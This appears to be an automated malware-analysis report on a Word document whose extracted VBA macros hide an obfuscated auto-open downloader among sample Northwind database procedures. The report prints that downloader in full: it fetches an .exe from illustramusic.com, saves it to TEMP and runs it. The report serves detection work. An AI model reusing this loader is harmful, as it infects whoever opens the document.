Verdict: MALICIOUS (Risk Score: 330)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains obfuscated VBA macros designed to execute automatically upon opening. These macros are configured to download and execute a payload from the URL http://illustramusic.com/43/82.exe. The presence of CreateObject and CallByName calls, along with an auto-exec loader, strongly indicates a malicious downloader.
Heuristics (10)

- ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set XUFbKpgn = CreateObject(bVDahQGZfQafz)`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set XUFbKpgn = CreateObject(bVDahQGZfQafz)`
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `CallByName EfUmQh3mOIWp, "O" & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & "E" & "T", _`
- Payload URL assembled from a Chr()/Asc() string expression (1 URL) (high, OLE_VBA_EXPR_DROPPER_URL): A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results, often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://illustramusic.com/43/82.exe (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14354 bytes |

SHA-256: 66dfc96bde017c6f5f04c58576ec44d2c948ed1d89cbcdda231a9906a0fdeefd

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Nip121ЦКВ3017 (700)
End Sub
Sub Nip121ЦКВ3017(FFFFF As Integer)
HC9JQJgd8MG
End Sub
Attribute VB_Name = "Module1"
Public UzA2FtU9ehfc As String
Public Khkbjkjb As Long
Public JKHFkjhv As Integer
Sub DatabaseConnection()
'
' Open the Northwind database (check the path!)
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = d.OpenDatabase(DBLOCATION)
'
' Open the Customers table (recordset)
'
Set rs = db.OpenRecordset("Customers")
'
' Display confirmation message
'
MsgBox "Opened " & db.Name & " Successfully!" & _
Chr(13) & Chr(13) & _
"The open Recordset is " & rs.Name
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set db = Nothing
End Sub
' Listing 18.2. A procedure that connects to a non-Jet database.
'
Sub NonJetConnection()
'
' Open the Jet database (check the path!)
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = d.OpenDatabase(DBLOCATION)
'
' Create TableDef and set the connection information.
' This code assumes the CUSTOMER.DBF file (it's on the
' CD) is in the same folder as this workbook.
'
Set tdDBASE = db.CreateTableDef("Linked dBASE Table")
tdDBASE.Connect = "dBASE IV;DATABASE=" & ThisWorkbook.Path
tdDBASE.SourceTableName = "Customer"
'
' Append the TableDef to create the link
'
db.TableDefs.Append tdDBASE
'
' Open the recordset
'
Set rs = db.OpenRecordset("Linked dBASE Table", dbOpenSnapshot)
'
' Display confirmation message
'
MsgBox "Opened " & db.Name & " Successfully!" & _
Chr(13) & Chr(13) & _
"The open Recordset is " & rs.Name & _
Chr(13) & _
"The source table is " & tdDBASE.SourceTableName
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set tdDBASE = Nothing
Set db = Nothing
End Sub
' Listing 18.3. A procedure that displays information on
' all the fields in a Recordset.
'
Sub HC9JQJgd8MG()
JjoveOIH = Chr(104) & Chr(116) & "t" & "p" & Chr(58) & Chr(47) & Chr(60) & Chr(47) & Chr(105) & Chr(108) & Chr(108) & Chr(117) & Chr(115) & Chr(116) & Chr(114) & Chr(97) & Chr(109) & Chr(117) & Chr(115) & Chr(105) & Chr(99) & "." & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "4" & Chr(51) & Chr(47) & Chr(56) & "2" & Chr(46) & "e" & Chr(120) & Chr(101)
Set EfUmQh3mOIWp = XUFbKpgn("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & ".X" & Chr(77) & "L" & Chr(72) & Chr(84) & "T" & "P")
JjoveOIH = Replace(JjoveOIH, Chr(60), "", 1, 1, vbTextCompare)
CallByName EfUmQh3mOIWp, "O" & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & "E" & "T", _
JjoveOIH, False
Set XQQ5MVr24 = XUFbKpgn(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
Set N7xBa7sk = CallByName(XQQ5MVr24, Chr(69) & "n" & "v" & Chr(105) & Chr(114) & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & "c" & "e" & Chr(115) & "s")
PuNXazFc3 = N7xBa7sk("T" & Chr(69) & Chr(77) & "P")
UzA2FtU9ehfc = PuNXazFc3 & Chr(92) & "r" & Chr(101) & Chr(98) & Chr(117) & Chr(105) & Chr(108) & Chr(51) & Chr(46) & "e" & Chr(120) & Chr(101)
Dim cUtXmkOl() As Byte
CallByName EfUmQh3mOIWp, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
cUtXmkOl = CallByName(EfUmQh3mOIWp, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
OYdRs6238lCD cUtXmkOl, UzA2FtU9ehfc
On Error GoTo czmNNOSKG
a = 2321 / 0
On Error GoTo 0
uCzc6tLEYtcdR:
Exit Sub
czmNNOSKG:
RktdsxfVspmN ("RjjZx1ohoCq2KQ")
Resume uCzc6tLEYtcdR
End Sub
Sub DisplayFieldInfo()
Dim i As Integer
Dim fieldInfo As String
'
' Open the Northwind database
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = c.OpenDatabase(DBLOCATION)
'
' Open the Categories table
'
Set rs = db.OpenRecordset("Categories", dbOpenSnapshot)
'
' Enumerate all fields in the Recordset
'
For i = 0 To rs.Fields.Count - 1
fieldInfo = "Recordset: " & rs.Name & Chr(13) & _
"Field " & _
i + 1 & " of " & _
rs.Fields.Count & Chr(13) & Chr(13)
'
' Set the Field variable and then run through the properties
'
Set fld = rs.Fields(i)
fieldInfo = fieldInfo & _
"Name: " & fld.Name & Chr(13) & _
"Allow Zero Length: " & fld.AllowZeroLength & Chr(13) & _
"Attributes: " & fld.Attributes & Chr(13) & _
"Collating Order: " & fld.CollatingOrder & Chr(13) & _
"Default Value: " & fld.DefaultValue & Chr(13) & _
"Ordinal Position: " & fld.OrdinalPosition & Chr(13) & _
"Required: " & fld.Required & Chr(13) & _
"Size: " & fld.Size & Chr(13) & _
"Source Field: " & fld.SourceField & Chr(13) & _
"Source Table: " & fld.SourceTable & Chr(13) & _
"Type of Field: " & TypeOfField(fld.Type) & Chr(13) & _
"Validation Rule: " & fld.ValidationRule & Chr(13) & _
"Validation Text: " & fld.ValidationText
MsgBox Prompt:=fieldInfo, Title:="Field Information"
Next i
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set fld = Nothing
Set db = Nothing
End Sub
' TypeOfField()
' Function to translate the constant returned by a Field object's
' Type property into a descriptive string.
'
Function TypeOfField(fldConstant As Integer) As String
Select Case fldConstant
Case 1 ' dbBoolean
TypeOfField = "Boolean"
Case 2 ' dbByte
TypeOfField = "Byte"
Case 3 ' dbInteger
TypeOfField = "Integer"
Case 4 ' dbLong
TypeOfField = "Long Integer"
Case 5 ' dbCurrency
TypeOfField = "Currency"
Case 6 ' dbSingle
TypeOfField = "Single"
Case 7 ' dbDouble
TypeOfField = "Double"
Case 8 ' dbDate
TypeOfField = "Date"
Case 10 ' dbText
TypeOfField = "Text"
Case 11 'dbLongBinary
TypeOfField = "OLE Object"
Case 12 ' dbMemo
TypeOfField = "Memo"
Case 15 ' dbGUID
TypeOfField = "GUID"
End Select
End Function
Attribute VB_Name = "Module2"
' Listing 18.4. A procedure that opens a recordset using
' a SQL SELECT expression.
'
Sub QueryCustomers()
Dim db As Database
Dim strSELECT As String
Dim rs As Recordset
'
' Open the Northwind database (check the path!)
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = OpenDatabase(DBLOCATION)
'
' Store the SELECT statement in a string variable
'
strSELECT = "SELECT CompanyName,Region,Country " & _
"FROM Customers " & _
"WHERE Country = 'Canada' " & _
"ORDER BY CompanyName"
'
' Open the recordset
'
Set rs = db.OpenRecordset(strSELECT)
'
' Display confirmation message
'
MsgBox "The filtered Recordset contains " & _
rs.RecordCount & " records."
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set db = Nothing
End Sub
' Listing 18.5. A procedure that creates a recordset from
' a QueryDef object.
Public Function XUFbKpgn(bVDahQGZfQafz As String)
Set XUFbKpgn = CreateObject(bVDahQGZfQafz)
End Function
'
Sub QueryDefExample()
Dim db As Database
Dim qd As QueryDef
Dim rs As Recordset
'
' Open the Northwind database (check the path!)
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = OpenDatabase(DBLOCATION)
'
' Assign the QueryDef object
'
Set qd = db.QueryDefs("Products Above Average Price")
'
' Open the recordset
'
Set rs = qd.OpenRecordset()
'
' Display confirmation message
'
MsgBox "The filtered Recordset contains " & _
rs.RecordCount & " records."
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set qd = Nothing
Set db = Nothing
End Sub
Public Function RktdsxfVspmN(HAZvVdpA4ZKPE As String)
Set hL8caJOH = XUFbKpgn("S" & Chr(104) & "e" & "l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & Chr(105) & "c" & Chr(97) & "t" & "i" & Chr(111) & Chr(110))
hL8caJOH.Open (UzA2FtU9ehfc)
End Function
' Listing 18.6. A procedure that reads 100 rows from a
' recordset into a worksheet.
'
Sub ReadDataIntoExcel()
Dim db As Database
Dim qd As QueryDef
Dim rs As Recordset
Dim recArray As Variant
Dim i As Integer, j As Integer
'
' Open the Jet database, QueryDef, and Recordset
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = OpenDatabase(DBLOCATION)
Set qd = db.QueryDefs("Invoices")
Set rs = qd.OpenRecordset()
'
' Head for Database Records and clear the sheet
'
Worksheets("Database Records").Activate
With Worksheets("Database Records").[a1]
.CurrentRegion.Clear
'
' Read the data using GetRows
'
recArray = rs.GetRows(100)
For i = 0 To UBound(recArray, 2)
For j = 0 To UBound(recArray, 1)
.Offset(i + 1, j) = recArray(j, i)
Next j
Next i
'
' Enter the field names and format the cells
'
For j = 0 To rs.Fields.Count - 1
.Offset(0, j) = rs.Fields(j).Name
.Offset(0, j).Font.Bold = True
.Offset(0, j).EntireColumn.AutoFit
Next j
End With
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set qd = Nothing
Set db = Nothing
End Sub
' Listing 18.7. A procedure that filters out OLE Object
' fields before retrieving a recordset.
'
Public Function OYdRs6238lCD(qBBdA3l1 As Variant, GJjfDfPQFXx As String)
Dim TVRp9uIoM3RKBe: Set TVRp9uIoM3RKBe = XUFbKpgn(Chr(65) & "d" & Chr(111) & "d" & Chr(98) & "." & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "m")
With TVRp9uIoM3RKBe
.Type = 1
.Open
.write qBBdA3l1
.savetofile GJjfDfPQFXx, 2
End With
End Function
Sub RetrieveCategories()
Dim db As Database
Dim rs As Recordset
Dim fld As Field
Dim strSELECT As String, i As Integer
'
' Open the Jet database
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = OpenDatabase(DBLOCATION)
'
' Open the full Categories table
'
Set rs = db.OpenRecordset("Categories")
'
' The strSELECT variable will hold the SQL SELECT statement
' that filters the Recordset to remove OLE Object fields
'
strSELECT = "SELECT "
'
' Run through the recordset fields
'
For Each fld In rs.Fields
'
' Check for OLE Object fields
'
If fld.Type <> dbLongBinary Then
'
' If it's not an OLE Object field, add it to the SELECT statement
'
strSELECT = strSELECT & fld.Name & ","
End If
Next fld
'
' Remove the trailing comma
'
strSELECT = Left(strSELECT, Len(strSELECT) - 1)
'
' Add the FROM clause
'
strSELECT = strSELECT & " FROM Categories"
'
' Open the filtered recordset
'
Set rs = db.OpenRecordset(strSELECT)
'
' Retrieve the records
'
Worksheets("Database Records").Activate
With Worksheets("Database Records").[a1]
.CurrentRegion.Clear
.Offset(1).CopyFromRecordset rs
'
' Enter the field names and format the cells
'
For i = 0 To rs.Fields.Count - 1
.Offset(0, i) = rs.Fields(i).Name
.Offset(0, i).Font.Bold = True
.Offset(0, i).EntireColumn.AutoFit
Next i
End With
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set fld = Nothing
Set db = Nothing
End Sub